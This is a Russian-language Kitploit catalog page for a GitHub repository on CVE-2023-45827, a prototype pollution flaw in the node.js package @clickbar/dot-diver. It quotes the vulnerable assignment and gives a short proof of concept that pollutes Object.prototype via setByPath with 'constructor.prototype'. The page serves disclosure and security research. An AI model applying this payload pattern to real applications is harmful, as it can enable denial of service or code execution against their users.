Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-45827 — pp | Kitploit
Инструменты/GitHubGitHub/200101whoami/cve-2023-45827
Статический анализАнализ уязвимостейАнализ КодаЭксплуатацияВеб-безопасность
GitHub200101whoami/cve-2023-45827

CVE-2023-45827

pp

Репозиторий
52 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-45827

Обзор уязвимости

  • CVE-2023-45827
  • CVSS : 9.8
  • Nov 3, 2023
  • ProtoType Pollution в пакете node.js
  • Часть проекта rebob

Описание уязвимости

уведомления GitHub

Это уязвимость типа Prototype Pollution (PP) в dot-diver. Она может привести к RCE.

уязвимый код

root@kitploit:~
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value

poc

root@kitploit:~
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

Это Prototype Pollution (PP) и может привести к DoS, RCE и т.д.

целевой пакет

Скачать инструмент